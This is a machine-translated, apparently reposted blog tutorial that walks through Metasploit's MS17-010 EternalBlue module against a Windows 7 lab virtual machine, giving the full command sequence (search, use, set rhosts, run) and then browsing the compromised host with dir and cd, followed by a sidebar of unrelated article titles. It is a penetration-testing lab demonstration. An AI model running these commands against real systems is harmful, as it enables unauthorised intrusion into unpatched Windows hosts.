当前位置:网站首页>Network security engineer Demo: the original * * is to get your computer administrator rights! 【***】
Network security engineer Demo: the original * * is to get your computer administrator rights! 【***】
2020-11-06 01:17:00 【Kali and programming】
Before class statement :
1、 This sharing is only for learning exchange , Please abide by the laws and regulations consciously !
2、 Search for :Kali And programming , Learn more about the Internet *** dried food !
3、Kali And programming is updated on time every day , Please study and pay attention to !
Body part
One 、 Background introduction
Metasploit It's a vulnerability framework . Its full name is The Metasploit Framework, It's called MSF.Metasploit As the most popular tool in the world , Not just because it's convenient and powerful , What's more, its framework . It allows users to develop their own vulnerability scripts , To test .Metasploit(msf) How powerful it is ? How to use it *** Controlling the victim's mainframe ? Now let's learn !
Two 、 Resources and equipment
1. Install well Win7 A virtual machine of
2. Xiaobai, who is ready to go .
3. Installed Kali Linux One virtual machine .
3、 ... and 、 Strategic arrangements
3.1 utilize Metasploit(msf)*** The framework performs on the target host ***, As shown in the figure below .
step 1: start-up Metasploit(msf)*** frame , As shown in the figure below .
command :msfconsole
step 2:Metasploit(msf)*** Framework started successfully , As shown in the figure below .
step 3: Search vulnerability , As shown in the figure below .
command :search Hole number
Example :search ms17-010
step 4: Retrieve the exploit module of the vulnerability, as shown in the figure below .
step 5: Select the corresponding exploit module and use , As shown in the figure below .
command :use Exploit module name
Example :use exploit/windows/smb/ms17_010_eternalblue
step 6: Check the parameters that need to be set for the vulnerability module used , As shown in the figure below ..
command :show option
step 7: Set up *** Parameters , As shown in the figure below .
command :set rhosts Victim host IP
Example :set rhosts 192.168.78.160
step 8: Check whether the corresponding parameters are set successfully , As shown in the figure below .
command :show options
step 9: Run the exploit module , As shown in the figure below .
command :run
step 10: As shown in the figure below , Successfully captured the target host
Tips :ETERNALBLUE overwrite completed successfully!
3.2 After entering *** Stage , utilize DOS Command control target host , As shown in the figure below .
step 1: Get into Windows Systematic cmd window , As shown in the figure below .
step 2: Use the command to view the folder information of the victim's host , As shown in the figure below .
command :dir
Switch folder directory :cd Folder name
Toggle character :cd The name of the drive 


Small make up a word knock creation , It's hard work , Can you pay attention to me ? You can also search for :Kali And programming , Learn more ****** How about the technique ! Rejection of piracy , Please state the source of the reprint :Kali And programming
Point me to learn more Kali Linux*** Testing and networking *** Practical skills !
版权声明
本文为[Kali and programming]所创,转载请带上原文链接,感谢
边栏推荐
- Listening to silent words: hand in hand teaching you sign language recognition with modelarts
- Sort the array in ascending order according to the frequency
- 如果前端不使用SPA又能怎样?- Hacker News
- 从海外进军中国,Rancher要执容器云市场牛耳 | 爱分析调研
- Cocos Creator 原始碼解讀:引擎啟動與主迴圈
- DevOps是什么
- Programmer introspection checklist
- htmlcss
- 【新閣教育】窮學上位機系列——搭建STEP7模擬環境
- CCR炒币机器人:“比特币”数字货币的大佬,你不得不了解的知识
猜你喜欢
随机推荐
xmppmini 專案詳解:一步一步從原理跟我學實用 xmpp 技術開發 4.字串解碼祕笈與訊息包
容联完成1.25亿美元F轮融资
【新閣教育】窮學上位機系列——搭建STEP7模擬環境
如果前端不使用SPA又能怎样?- Hacker News
WeihanLi.Npoi 1.11.0/1.12.0 Release Notes
Using Es5 to realize the class of ES6
通过深层神经网络生成音乐
Synchronous configuration from git to consult with git 2consul
恕我直言,我也是才知道ElasticSearch条件更新是这么玩的
The difference between Es5 class and ES6 class
Elasticsearch 第六篇:聚合統計查詢
Working principle of gradient descent algorithm in machine learning
Cos start source code and creator
[performance optimization] Nani? Memory overflow again?! It's time to sum up the wave!!
Polkadot series (2) -- detailed explanation of mixed consensus
从海外进军中国,Rancher要执容器云市场牛耳 | 爱分析调研
多机器人行情共享解决方案
Top 10 best big data analysis tools in 2020
你的财务报告该换个高级的套路了——财务分析驾驶舱
数据产品不就是报表吗?大错特错!这分类里有大学问



